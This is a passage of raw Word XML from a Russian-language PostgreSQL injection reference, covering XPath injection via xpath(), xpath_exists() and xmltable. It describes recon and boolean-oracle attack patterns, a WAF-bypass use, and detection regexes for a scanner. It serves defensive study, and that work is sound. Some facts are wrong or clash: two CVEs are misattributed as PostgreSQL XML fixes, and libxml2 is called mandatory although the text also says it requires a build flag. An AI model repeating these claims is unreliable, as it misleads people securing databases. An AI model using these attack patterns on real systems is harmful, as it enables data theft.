        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Параметризация SQL не помогает</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — даже если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xpath_expr</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> параметризован как bind variable, XPath-injection внутри строки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>происходит</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на уровне XPath-парсера, который видит уже-binded text как XPath-выражение.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCA33B3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему PostgreSQL принимает результат как валидный SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2E36F0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`xpath()`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> документирован в https://www.postgresql.org/docs/current/functions-xml.html#FUNCTIONS-XML-PROCESSING. Принимает любой text как XPath-expression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FE7805" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>libxml2-backend</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> парсит XPath 1.0 строго по спецификации W3C. Полная grammar: navigation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predicates (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[expr]</w:t>
      </w:r>
      <w:r>
        <w:t>), axes (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>child::</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>parent::</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>descendant::</w:t>
      </w:r>
      <w:r>
        <w:t>, и т.д.), functions (60+ built-in).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4F21B3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`PARSE_NONET`-флаг</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> включён в libxml2-binding всегда: external entities, external DTDs, network access блокированы. Это закрывает XXE-канал; CVE-2017-7484 был исторический фикс этого.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CC8741" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`XML_PARSE_HUGE`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — выключен по умолчанию (CVE-2021-43795). Это значит, очень большой XML-документ → ошибка парсинга, не DoS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626D7711" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Требования к среде</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7DB8B2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 8.3+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — XML type. 9.x+ — xmltable. 9.1+ — xpath_exists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E233F43" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегии</w:t>
      </w:r>
      <w:r>
        <w:t>: PUBLIC для всех функций.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493EA277" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`configure --with-libxml`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — PG должен быть собран с libxml2 (дефолт во всех бинарных дистрибуциях).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EB80C2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`xml`-колонка или `query_to_xml`/`table_to_xml`-вызов</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в коде приложения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB73792" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed</w:t>
      </w:r>
      <w:r>
        <w:t>: работает идентично. libxml2 — обязательная зависимость core PG.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DB8C25" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Как выглядит легитимное использование</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9C4972" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Фиксированные XPath</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xpath('/order/items/item', order_xml)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — конкретный path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BA8ABB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Параметризованный root</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xpath($1, xml_col)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — bind variable; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>всё равно injection-возможен</w:t>
      </w:r>
      <w:r>
        <w:t>, если $1 принимает arbitrary user-input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20690C7D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>xmltable для ETL</w:t>
      </w:r>
      <w:r>
        <w:t>: парсинг standardized XML-документов в табличный вид; обычно фиксированная схема, не user-controlled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7910E81B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Атака отличается:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A545B4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`//`-двойной-slash в payload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — почти всегда recon-tool (рекурсивный спуск). Legitimate XPath обычно с конкретными paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176FC177" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XPath functions `string()`/`substring()`/`starts-with()` в WHERE-fragment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — leak-pattern, не application-logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355DB91D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`xpath_exists` в boolean-context с user-controlled path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — boolean-oracle setup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679360EE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Контекст вызова</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: legitimate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xpath()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обычно SELECT-only, не вызывается из API-эндпоинта с user-controlled expression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFA6AAC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Версии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DB04A6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 8.3 – 17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — XML-тип.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4E4F0A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 9.1 – 17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — xpath_exists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603AFA7D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 10 – 17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — xmltable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A86EAB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed</w:t>
      </w:r>
      <w:r>
        <w:t>: работает идентично.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AA671E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Связанные паттерны</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3542D14D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.5 (XML mass dump)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query_to_xml</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>database_to_xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> дают всю БД в XML. 3.11.3 — атакует XPath над этим XML. Связка для massive recon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6443EC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 (Error-based)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — XPath-syntax-error даёт детальный error: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: could not parse XPath expression: "..."</w:t>
      </w:r>
      <w:r>
        <w:t>. Через ошибку leak текста payload — но не результата subquery (XPath не интерпретирует SQL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248EA37B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3 (Boolean-based blind)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Payload B — XPath-based boolean oracle. Альтернатива классическому SQL boolean-blind для случаев, когда тот заблокирован WAF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F226AFF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6 (OOB)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не пересекается</w:t>
      </w:r>
      <w:r>
        <w:t>: XXE в PG закрыт (XML_PARSE_NONET). OOB через XML невозможен.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366F6CCA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.11.2 (jsonb path)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — параллельный класс DSL-injection. 3.11.2 — JSONPath; 3.11.3 — XPath. Идентичные категории атак (path-traversal, recon, blind), разные DSL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAD450A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.11.4 (Array)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xpath()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xml[]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; обращение к элементам через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[N]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>array_to_string()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — пересечение с array-handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713E91A8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rules.py в DS-workshop2.0 — не покрыто:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> регекса для XPath-в-runtime-SQL (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\bxpath\s*\(\s*['"][^'"]*['"]?\s*\|\|</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\bxpath_exists\s*\(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\bxmltable\b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) нет. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Рекомендация:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> см. сводный regex категории 3.11 в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>summary-3.11.md</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0866D225" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B988F82" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: XML Functions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — xpath, xpath_exists, xmltable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C665A9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: XML Type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — type-семантика.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1436F2EB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>W3C: XPath 1.0 Specification</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — grammar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B11D1C7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Security: CVE-2017-7484</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — historical context для XXE-блокировки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A97FCF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Security: CVE-2021-43795</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — XML_PARSE_HUGE контекст.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2298EABD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>OWASP: XPath Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общий класс атак.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F721386" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PortSwigger Web Security Academy: XPath injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — практические payload-ы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3663E4BB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.11.4 Array vs scalar: ANY($1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314AA6BC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
